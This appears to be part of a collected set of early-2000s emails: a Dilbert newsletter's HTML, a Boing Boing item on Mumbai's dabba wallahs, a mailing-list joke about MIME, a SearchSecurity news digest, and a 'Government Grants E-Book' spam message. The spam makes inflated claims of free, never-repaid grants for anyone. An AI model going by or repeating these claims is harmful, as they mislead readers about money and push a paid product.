 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"200" HEIGHT=3D"59" BGCOLOR=3D"#FFFFFF" ROWSPAN=
 =3D"2"&gt;&lt;FONT FACE=3D"Arial,Verdana" SIZE=3D"1"&gt;&lt;IMG SRC=3D"http://www.comic=
 s.com/comics/dilbert/daily_dilbert/images/books.gif" WIDTH=3D"35" HEIGHT=3D=
 "15" BORDER=3D"0" ALT=3D"Books"&gt;&lt;BR&gt;&lt;A target=3D"_blank" HREF=3D"http://umm=
 ail4.unitedmedia.com:80/Click?q=3D57-YJKXII0tFp0ybw-F0u_u9RX_z9RR"&gt;&lt;IMG SRC=
 =3D"http://www.comics.com/comics/dilbert/ads/book_badge.gif" WIDTH=3D"169" =
 HEIGHT=3D"60" BORDER=3D"0" ALT=3D"Another Day in Cubicle Paradise"&gt;&lt;/A&gt;&lt;BR&gt;=
 &lt;BR&gt;Complete your collection while pretending to work!&lt;BR&gt;
 &lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3D81=
 -z1KaQ-KLrRxtx28pq_Rxt9CJZ9RR"&gt;&gt; Shop&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"10" HEIGHT=3D"59" BGCOLOR=3D"#FFFFFF" ROWSPAN=
 =3D"2"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"10" HEIGHT=3D"7" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"83" HEIGHT=3D"59" BGCOLOR=3D"#FFFFFF" ROWSPAN=
 =3D"2"&gt;&lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click=
 ?q=3Dab-ZcXKQYp0Y4QKmwdXyRiFnw8ZwdRR"&gt;&lt;IMG SRC=3D"http://www.comics.com/com=
 ics/dilbert/daily_dilbert/images/thumb_dilbert_mints.gif" WIDTH=3D"83" HEIG=
 HT=3D"57" BORDER=3D"0" ALT=3D"Dilbert Mints"&gt;&lt;/A&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"120" HEIGHT=3D"59" BGCOLOR=3D"#FFFFFF" ROWSPAN=
 =3D"2"&gt;&lt;FONT FACE=3D"Arial,Verdana" SIZE=3D"1"&gt;&lt;IMG SRC=3D"http://www.comic=
 s.com/comics/dilbert/daily_dilbert/images/mints.gif" WIDTH=3D"35" HEIGHT=3D=
 "15" BORDER=3D"0" ALT=3D"Graphic (live connection required)"&gt;&lt;BR&gt;&lt;IMG SRC=
 =3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"120=
 " HEIGHT=3D"1" BORDER=3D"0" ALT=3D""&gt;&lt;BR&gt;They're character-shaped, in colle=
 ctible tins.&lt;BR&gt;&lt;B&gt;&amp;gt; &lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedm=
 edia.com:80/Click?q=3Dd5-p-SiQzL3ad2C6E2HCF4Y-4m5V9RR"&gt;Shop&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;=
 /TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"10" HEIGHT=3D"59" BGCOLOR=3D"#FFFFFF" ROWSPAN=
 =3D"2"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"10" HEIGHT=3D"10" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"162" HEIGHT=3D"24" BGCOLOR=3D"#FFFFFF" COLSPAN=
 =3D"2"&gt;&lt;FONT FACE=3D"Arial,Verdana" SIZE=3D"1"&gt;&lt;IMG SRC=3D"http://www.comic=
 s.com/comics/dilbert/daily_dilbert/images/clothing_and_posters.gif" WIDTH=
 =3D"121" HEIGHT=3D"15" BORDER=3D"0" ALT=3D""&gt;&lt;BR&gt;Get any Dilbert strip publ=
 ished in the last 90 days printed on a&lt;BR&gt;T-shirt, sweatshirt or poster. Se=
 lected older strips are also available.&lt;BR&gt;
 &lt;B&gt;&amp;gt; &lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Clic=
 k?q=3Dff-sVHVQmste4RDbCdZxPhzoVUk5RRR"&gt;Shop&lt;/A&gt;&lt;/B&gt;&lt;BR&gt;
 &lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDT=
 H=3D"148" HEIGHT=3D"20" BORDER=3D"0" ALT=3D""&gt;&lt;/FONT&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09&lt;TD WIDTH=3D"14" HEIGHT=3D"35" BGCOLOR=3D"#FFFFFF"&gt;&lt;IMG SRC=3D"=
 http://www.comics.com/comics/dilbert/daily_dilbert/images/bullet.gif" WIDTH=
 =3D"14" HEIGHT=3D"11" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"148" HEIGHT=3D"35" BGCOLOR=3D"#FFFFFF"&gt;&lt;FONT FA=
 CE=3D"Arial,Verdana" SIZE=3D"1"&gt;&lt;A target=3D"_blank" HREF=3D"http://ummail4=
 .unitedmedia.com:80/Click?q=3D14-5MiAIF-KaBxNkZ48ZgQpIXIl7dRR"&gt;View all pro=
 ducts&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"585" HEIGHT=3D"5" BGCOLOR=3D"#FFFFFF" COLSPAN=
 =3D"7"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"585" HEIGHT=3D"5" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;!-- COMIC STRIP HERE --&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"600" HEIGHT=3D"228" BGCOLOR=3D"#FFFFFF" ALIGN=
 =3D"RIGHT" COLSPAN=3D"10"&gt;&lt;FONT FACE=3D"helvetica, arial" SIZE=3D"1"&gt;&lt;A tar=
 get=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3D29-SgTrI=
 jM2Hozdm5nNyDEptl6PrdRR"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/d=
 aily_dilbert/images/bullet.gif" WIDTH=3D"14" HEIGHT=3D"11" ALT=3D"" BORDER=
 =3D"0"&gt;Buy This Strip&lt;/A&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;A HREF=3D"http://www.comics.com=
 /webmail/SendAStrip?AppName=3DSendAStrip&amp;ComicName=3D/comics/dilbert/&amp;Attac=
 hments=3D/comics/dilbert/archive/images/dilbert2003482820710.gif&amp;EmailDate=
 =3DJuly-10-2002"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/daily_dil=
 bert/images/bullet.gif" WIDTH=3D"14" HEIGHT=3D"11" ALT=3D"" BORDER=3D"0"&gt;Se=
 nd This Strip to a Friend&lt;/A&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;A target=3D"_blank" HREF=3D=
 "http://ummail4.unitedmedia.com:80/Click?q=3D53-n8CdINnRpyDM-psjH-xb_IfwI9R=
 R"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/daily_dilbert/images/bu=
 llet.gif" WIDTH=3D"14" HEIGHT=3D"11" ALT=3D"" BORDER=3D"0"&gt;Month of Dilbert=
 &lt;/A&gt;&amp;nbsp;&amp;nbsp;&lt;/FONT&gt;&lt;BR&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert=
 /images/clear_dot.gif" WIDTH=3D"600" HEIGHT=3D"2" BORDER=3D"0" ALT=3D""&gt;&lt;BR=
 &gt;&lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3D7=
 d-FFBqIDLUd2DsXI4UytqS-9z3UdRR"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/di=
 lbert/archive/images/dilbert2003482820710.gif" BORDER=3D"0" ALT=3D"You need=
  to go online to see today's strip and other cool features on the Daily Dil=
 bert. "&gt;&lt;/A&gt;&lt;BR&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/cle=
 ar_dot.gif" WIDTH=3D"600" HEIGHT=3D"8" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09&lt;/TABLE&gt;
 =09=09=09&lt;!-- ONLINE STORE AND STRIP TABLE END --&gt;
 =09=09=09
 =09=09=09&lt;!-- FOOTER TABLE BEGIN --&gt;
 =09=09=09&lt;TABLE WIDTH=3D"610" CELLPADDING=3D"0" CELLSPACING=3D"0" BORDER=3D=
 "0"&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"610" HEIGHT=3D"1" BGCOLOR=3D"#003366" COLSPAN=
 =3D"8"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"610" HEIGHT=3D"1" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"1" BGCOLOR=3D"#003366"&gt;&lt;IMG SRC=3D"http://www.c=
 omics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"1" HEIGHT=3D"4" BOR=
 DER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"10" BGCOLOR=3D"#FFFFFF"&gt;&lt;IMG SRC=3D"http://www.=
 comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"10" HEIGHT=3D"4" B=
 ORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"478" BGCOLOR=3D"#FFFFFF"&gt;&lt;IMG SRC=3D"http://www=
 .comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"478" HEIGHT=3D"4"=
  BORDER=3D"0" ALT=3D""&gt;&lt;BR&gt;&lt;FONT FACE=3D"helvetica, arial" SIZE=3D"1"&gt;&lt;A ta=
 rget=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3Da8-02QZ=
 QQZO8FsQPNXDtcsrwMJWwsRR"&gt;Unsubscribe&lt;/A&gt; | &lt;A target=3D"_blank" HREF=3D"ht=
 tp://ummail4.unitedmedia.com:80/Click?q=3Dd2-THH_QULylbSNFPV3Ge2S5G1mkRRR"&gt;=
 Modify Your Subscription&lt;/A&gt; | &lt;A target=3D"_blank" HREF=3D"http://ummail4.=
 unitedmedia.com:80/Click?q=3Dfc-WpomQVw_4c4WGxZa9p0FA0wF5dRR"&gt;Request a New=
  Subscription&lt;/A&gt; | &lt;a href=3D"mailto:dilberthelp@unitedmedia.com"&gt;Report S=
 ubscription Problems&lt;/A&gt;&lt;BR&gt;
 &lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3D26=
 -KqZVIiMmfPuWOSdBBNk-Z1dXjsRR"&gt;Subscribe to the Dilbert Newsletter/Join Dog=
 bert's New Ruling Class&lt;/A&gt; |&lt;BR&gt;
 &lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3D50=
 -M_6BIR0rsFUiFr_AS5nxjtaOIRRR"&gt;Dilbert on Your Site/Intranet&lt;/A&gt; | &lt;A targe=
 t=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3D7a-EETAIPB=
 -Be1flYzhU0ckfggJpsRR"&gt;Advertising Info&lt;/A&gt; | &lt;A target=3D"_blank" HREF=3D"=
 http://ummail4.unitedmedia.com:80/Click?q=3Da4-HG_sQ6p9oUtGwrK46HL35O3CssRR=
 "&gt;Dilbert in Your Publication&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"45" BGCOLOR=3D"#FFFFFF"&gt;&lt;IMG SRC=3D"http://www.=
 comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"45" HEIGHT=3D"4" B=
 ORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"62" BGCOLOR=3D"#FFFFFF"&gt;&lt;IMG SRC=3D"http://www.=
 comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"62" HEIGHT=3D"4" B=
 ORDER=3D"0" ALT=3D""&gt;&lt;BR&gt;&lt;A target=3D"_blank" HREF=3D"http://ummail4.united=
 media.com:80/Click?q=3Dce-SdMCQMsow2JPkSs3u_zGKPsvo9RR"&gt;&lt;IMG SRC=3D"http://=
 www.comics.com/comics/dilbert/daily_dilbert/images/comics_com_logo.gif" WID=
 TH=3D"62" HEIGHT=3D"42" BORDER=3D"0" ALT=3D"Comics.com"&gt;&lt;/A&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"10" BGCOLOR=3D"#FFFFFF"&gt;&lt;IMG SRC=3D"http://www.=
 comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"10" HEIGHT=3D"4" B=
 ORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"4" BACKGROUND=3D"http://www.comics.com/comics/d=
 ilbert/daily_dilbert/images/white_line_right.gif"&gt;&lt;IMG SRC=3D"http://www.co=
 mics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"4" HEIGHT=3D"4" BORD=
 ER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"610" COLSPAN=3D"8"&gt;&lt;IMG SRC=3D"http://www.comic=
 s.com/comics/dilbert/daily_dilbert/images/daily_dilbert_footer.gif" WIDTH=
 =3D"610" HEIGHT=3D"11" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09&lt;/TABLE&gt;
 =09=09=09&lt;!-- FOOTER TABLE END --&gt;
 =09=09=09
 =09=09&lt;/TD&gt;
 =09=09&lt;TD&gt;
 =09=09
 =09=09=09
 =09=09
 =09=09=09&lt;!-- SKYSCRAPER TABLE BEGIN --&gt;
 =09=09=09&lt;table border=3D"0" cellspacing=3D"0" cellpadding=3D"0" height=3D"=
 600"&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09=09&lt;TD&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/=
 small_ad.gif" WIDTH=3D"20" HEIGHT=3D"11" BORDER=3D"0" ALT=3D"Advertisement"=
 &gt;&lt;BR&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif"=
  WIDTH=3D"2" HEIGHT=3D"2" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09=09&lt;TD&gt;&lt;a href=3D"http://www.partner2profit.com/redir.cfm?ccode=
 =3D1D74C2EA&amp;pcode=3DEF39755C" target=3D"_blank"&gt;&lt;img src=3D"http://www.flow=
 go.com/images/bt/p2p.gif?ccode=3D1D74C2EA&amp;pcode=3DEF39755C" width=3D120 hei=
 ght=3D600 border=3D0&gt;&lt;/a&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09&lt;/table&gt;
 =09=09=09&lt;!-- SKYSCRAPER TABLE END --&gt;
 =09=09=09
 =09=09=09
 =09=09=09
 =09=09&lt;/TD&gt;
 =09&lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;!-- CONTENT AND SKYSCRAPER AD TABLE END --&gt;
 &lt;script language=3D"JavaScript"&gt;
 &lt;!--
 document.writeln ('&lt;layer SRC=3D"http://ad.doubleclick.net/adl/dilbert.emai=
 l.com/email/;sz=3D468x60;ord=3D' + same + '?" visibility=3D"hidden" width=
 =3D468 height=3D60 onload=3D"moveToAbsolute(ph1.pageX,ph1.pageY);clip.width=
 =3D468;clip.height=3D60;visibility=3D\'show\';"&gt;&lt;/layer&gt;');
 //--&gt;
 &lt;/script&gt;
 &lt;/TD&gt;
 &lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
 &lt;IMG HEIGHT=3D1 WIDTH=3D1 SRC=3D"http://ummail4.unitedmedia.com:80/Click?q=
 =3D0d-3a2unDr3RbASR2VR56fIrkpY"&gt;
 --23561619.1026296118170.JavaMail.root.umsan1--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Dabba Wallahs: India's meal-delivery FedEx
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85494359
 Date: Not supplied
 Amazing story about the "dabba wallahs" -- India's 112-year-old meal-delivery 
 system that outdoes FedEx using pictograms, bicycles, and largely illiterate 
 (but well-compensated) deliverypeople: 
     As part of the tiffin distribution process, every day the meals are picked 
     up from commuters' homes in Mumbai long after the commuters have left for 
     work, delivered to them on time, then picked up and delivered home before 
     the commuters return. 
     Each tiffin carrier has, painted on its top, a number of symbols that 
     identify where the carrier was picked up, the originating and destination 
     stations and the address to which it is to be delivered. 
     After the tiffin carriers are picked up, they are taken to the nearest 
     railway station, where they are sorted according to the destination 
     station. 
     At the destination station they are unloaded by other dabba wallahs and 
     re-sorted, this time according to street address and floor. 
     The 80 kg crates of carriers, carried on dabba wallahs' heads, hand-wagons 
     and cycles are delivered at 12.30 p.m., picked up at 1.30 p.m., and 
     returned when they came. 
     The system relies on multiple relays of dabba wallahs, and a single tiffin 
     box may change hands up to three times during its journey from home to 
     office.  
 Link[1] Discuss[2] (_Thanks, Tom!_)
 [1] http://in.news.yahoo.com/020920/43/1vfdw.html
 [2] http://www.quicktopic.com/boing/H/H96NaZc8PTyq
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: YOU MAY WANT TO LOOK INTO FUNDING FROM GRANTS....
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;body&gt;
 &lt;hr width = "100%"&gt;
 &lt;center&gt;&lt;font size = "+2" color = "#44C300"&gt;&lt;b&gt;Government Grants E-Book 2002 edition&lt;/font&gt;&lt;/b&gt;&lt;p&gt;
 &lt;table&gt;&lt;Tr&gt;&lt;td&gt; 
 &lt;li&gt;You Can Receive The &lt;font color = "green"&gt;&lt;b&gt;Money&lt;/b&gt;&lt;/font&gt; You Need...
 &lt;li&gt;Every day &lt;b&gt;&lt;font color = "green"&gt;millions of dollars&lt;/font&gt;&lt;/b&gt; are given away to people, just like you!!
 &lt;li&gt;Your Government spends &lt;b&gt;&lt;font color = "green"&gt;billions&lt;/font&gt;&lt;/b&gt; of tax dollars on government grants.
 &lt;li&gt;Do you know that private foundations, trust and corporations are
 &lt;li&gt;required to give away a portion of theirs assets. It doesn't matter,
 &lt;li&gt;where you live (USA ONLY), your employment status, or if you are broke, retired
 &lt;li&gt;or living on a fixed income. There may be a grant for you!
 &lt;hr width = "100%"&gt;
 &lt;li&gt;&lt;font color = "red"&gt;&lt;b&gt;ANYONE&lt;/b&gt;&lt;/font&gt; can apply for a Grant from 18 years old and up!
 &lt;li&gt;We will show you HOW &amp; WHERE to get Grants. &lt;font color = "red"&gt;&lt;b&gt;THIS BOOK IS NEWLY UPDATED WITH THE MOST CURRENT INFORMATION!!!&lt;/b&gt;&lt;/font&gt;
 &lt;li&gt;Grants from $500.00 to $50,000.00 are possible!
 &lt;li&gt;GRANTS don't have to be paid back, EVER!
 &lt;li&gt;Grants can be ideal for people who are or were bankrupt or just have bad credit.
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;br&gt;&lt;font size = "+1"&gt;Please Visit Our Website&lt;p&gt;&lt;/font&gt;
 And Place Your &lt;font color = "red"&gt; &lt;b&gt;Order TODAY!&lt;/b&gt; &lt;/font&gt;&lt;a href = "http://www153.wiildaccess.com/"&gt;&lt;b&gt;&lt;font size="5"&gt;CLICK HERE&lt;/font&gt;&lt;/b&gt; &lt;/a&gt;&lt;p&gt;&amp;nbsp;&lt;p&gt;
 &lt;font size="1"&gt;
 We apologize for any email you may have inadvertently received.&lt;br&gt;
 Please &lt;a href = "http://www153.wiildaccess.com/remove.htm"&gt;CLICK HERE&lt;/a&gt; to be removed from future mailings.&lt;/font&gt;&lt;br&gt;
  [JK9^":}H&amp;*TG0BK5NKIYs5]
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: The MIME information you requested (last changed 3154 Feb 14)
</t>
  </si>
  <si>
    <t xml:space="preserve">
 UW Email Robot said:
 &gt; What is MIME?
 I know what MIME is godammit ;)
 &gt; Since MIME is only a few years old, ...
 a *few*?  Time to update pine-robot-blurb.txt on
 docserver.cac.washington.edu, I think.
 Has anyone figured out what's up with this?  Does someone out there think
 that FoRK needs some MIME tutoring?
 --j.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Today's news: Serious PHP flaw found
</t>
  </si>
  <si>
    <t xml:space="preserve">SEARCHSECURITY | Security and Industry News
 July 23, 2002
 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 FROM OUR SPONSOR:
 - FREE Security Webcast from Microsoft and NetIQ 
 http://searchSecurity.com/r/0,,4619,00.htm?FreeSecurityWebcast 
 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 IN THIS ISSUE | Today's Highlights
 1. THE TOP STORIES 
 - PHP flaw could crash, burn Web servers
 - Quick Takes: Major vendors throw support at SAML
 - NetBugtraq founder's security tips
 - ROI calculators: Honest projection or fuzzy math?
 2. IMPORTANT ANNOUNCEMENTS AND LINKS
 - New poll: Will heuristics ever fully replace signature-based
 antivirus protection?
 - Infosec Know IT All Daily Trivia: Tuesday, July 23, 2002
 - Network Security Tip: Firewall best practices 
 - Best Web Links: Risk analysis
 - The Missing Link: Scot has cyber tomb with a view
 ____________________________________________________________________
 *********************** SPONSORED BY: NetIQ **********************
 FREE Security Webcast from Microsoft and NetIQ 
 Is your enterprise secure? Learn how to combat hackers during the
 free 8/20/02 Webcast, "Computer Crime Forensics," Part II of the
 "Defending the Enterprise" series. Tune in as security experts from
 the FBI, Shell, Microsoft and NetIQ show you how to dig deep to trace
 the steps of a hacker and preserve valuable evidence if you're ever
 compromised. They'll also cover how to safeguard and harden your
 Windows network during a live Q&amp;A session. Discover expert
 countermeasures to secure and protect your enterprise. Register now! 
 http://searchSecurity.com/r/0,,4619,00.htm?FreeSecurityWebcast 
 ____________________________________________________________________
 LEAD STORY
 PHP FLAW COULD CRASH, BURN WEB SERVERS | News: SearchSecurity
 A security vulnerability in the popular PHP scripting language could
 allow an attacker to crash a Web server or run arbitrary code on a
 system. Only particular versions of PHP are impacted, and users are
 urged to upgrade or patch immediately. 
 http://www.searchsecurity.com/originalContent/0,289142,sid14_gci840432,00.html  
 MORE ON THIS TOPIC
 &gt;&gt; Read the SearchSecurity news exclusive, "Open-source security:
 It's all in the scrutiny:"
 http://searchsecurity.techtarget.com/originalContent/0,289142,sid14_gci811614,00.html 
 &gt;&gt; Visit our Best Web Links on vulnerabilities:
 http://searchsecurity.techtarget.com/bestWebLinks/0,289521,sid14_tax281934,00.html 
 &gt;&gt; Click here for Top 10 Articles of the Week:
 http://searchsecurity.techtarget.com/originalContent/0,289142,sid14_gci816475,00.html    
 ____________________________________________________________________
 ********************************************************************
 OTHER STORIES
 In addition to the headlines below, others are available on our news
 page.
  &gt;&gt; Full Stories: http://searchsecurity.techtarget.com/news/
 QUICK TAKES: MAJOR VENDORS THROW SUPPORT AT SAML | News:
 SearchSecurity
 RSA Security and CRM vendor ePeople announce support for the Security
 Assertion Markup Language (SAML) specification, leading off this
 edition of Quick Takes. Also included are items from Red Siren and
 Veridian, ISS and St. Bernard Software, WatchGuard and Sigaba. 
 http://www.searchsecurity.com/originalContent/0,289142,sid14_gci840356,00.html 
 NETBUGTRAQ FOUNDER'S SECURITY TIPS | News: SearchWindowsManageability
 What's wrong with Windows security? How can you right those wrongs?
 Security expert Russ Cooper offers his insights and tips. 
 http://searchwindowsmanageability.techtarget.com/originalContent/0,289142,sid33_gci839660,00.html  
 ROI CALCULATORS: HONEST PROJECTION OR FUZZY MATH? | News:
 SearchEBusiness
 Corporate budget watchdogs are breathing down your neck, wanting you
 to justify every technology expense. So do ROI calculators accurately
 forecast a project's likely returns or merely encourage you to open
 up your wallet and spend?
 http://searchebusiness.techtarget.com/originalContent/0,289142,sid19_gci839773,00.html 
 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 ADDITIONAL SECURITY HEADLINES
 All headlines, including those below, are available on our news page.
  &gt;&gt; Full Stories: http://searchsecurity.techtarget.com/news/
 - WHAT DOES THE FUTURE HOLD FOR PGP?
 - GAO FAULTS U.S. CYBER-SECURITY EFFORTS
 - FIREWALL SAFEGUARDS WEB-ENABLED APPS
 - SECURITY FLAWS IN PINGTEL PHONE
 ____________________________________________________________________
 IMPORTANT FEATURES AND LINKS:
 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 TAKE OUR POLL | SearchSecurity reader survey
 Will heuristics ever fully replace signature-based antivirus
 protection?
 http://searchsecurity.techtarget.com/poll 
 PREVIOUS POLL RESULTS
 What is the weakest security link in your organization?
 People (138 votes) 92%
 Technology (6 votes) 4%
 Don't know (6 votes) 4%
 Total votes: 150
 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 INFOSEC KNOW IT ALL DAILY TRIVIA | Tuesday, July 23, 2002 
 This type of IDS involves a wrapper or a scanner that looks for
 specific events. When it sees the event, it correlates it and decides
 whether or not it's an acceptable event.
 a. anomaly detection
 b. signature-based
 c. blind barricade
 d. profile detection
 &gt;&gt; Check your answer:
 http://searchsecurity.techtarget.com/tip/1,289483,sid14_gci840086,00.html 
 &gt;&gt; Visit our Featured Topic on intrusion detection:
 http://searchsecurity.techtarget.com/featuredTopic/0,290042,sid14_gci779273,00.html 
 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 FIREWALL BEST PRACTICES | Network Security Tip
 Firewalls are not the end-all, be-all solution to information
 security. They are, however, a necessary component of an effective
 information security infrastructure. The following list is a set of
 best practices, in no particular order, that you should consider to
 ensure that your firewall is configured for optimal performance and
 effectiveness...
 http://searchsecurity.techtarget.com/tip/1,289483,sid14_gci838215,00.html  
 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 RISK ANALYSIS | Best Web Links
 Knowing where your company's security weaknesses are allow you to
 prioritize and better allocate your resources. Learn more about risk
 analysis from the resources we've collected here.
 http://searchsecurity.techtarget.com/bestWebLinks/0,289521,sid14_tax281906,00.html  
 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 THE MISSING LINK | Scot has cyber tomb with a view
 Sometimes an epitaph just can't be the last word. Billy Kemp was a
 great Scot who died a couple of years ago at the young age of 52. He
 was a councilman, husband, father and pillar of his community. His
 family couldn't possibly post all that on a tombstone. But they did
 manage to fit http://www.billykemp.org.uk/ on there. Yep, Kemp's
 tombstone doubles as a billboard for his Web site, created
 posthumously by his son as a tribute to his father's life. The grave
 site has gotten more than 33,000 hits, perhaps more visits than the
 gravesite!
 SOURCE: vnunet
 http://www.vnunet.com/News/1133759 
 &gt;&gt; Have you missed a Missing Link? Peruse our archive: 
 http://searchsecurity.techtarget.com/bestWebLinks/0,289521,sid14_tax292200,00.html
 ____________________________________________________________________
 ********************** SEARCHSECURITY CONTACTS *********************
 CATHY GAGNE, Site Editor (mailto:cgagne@techtarget.com)
    &gt;&gt; Send in your original articles and best practices.
 ____________________________________________________________________
 CRYSTAL FERRARO, Assistant Editor (mailto:cferraro@techtarget.com)
    &gt;&gt; Send in your favorite Web sites.
 ____________________________________________________________________
 MIKE MIMOSO, News Editor (mailto:mmimoso@techtarget.com)
    &gt;&gt; Send in your news, product announcements and article ideas.
 ____________________________________________________________________
 ED HURLEY, Assistant News Editor (mailto:ehurley@techtarget.com)
    &gt;&gt; Send in your news, product announcements and article ideas.
 ____________________________________________________________________
 GABRIELLE DERUSSY (mailto:gderussy@techtarget.com)
    &gt;&gt; Sponsor this or any other TechTarget newsletter.
 ____________________________________________________________________
 ____________________________________________________________________
 ********************* ABOUT THIS NEWSLETTER ************************
 Created by TechTarget (http://www.techtarget.com)
  TechTarget - The Most Targeted IT Media
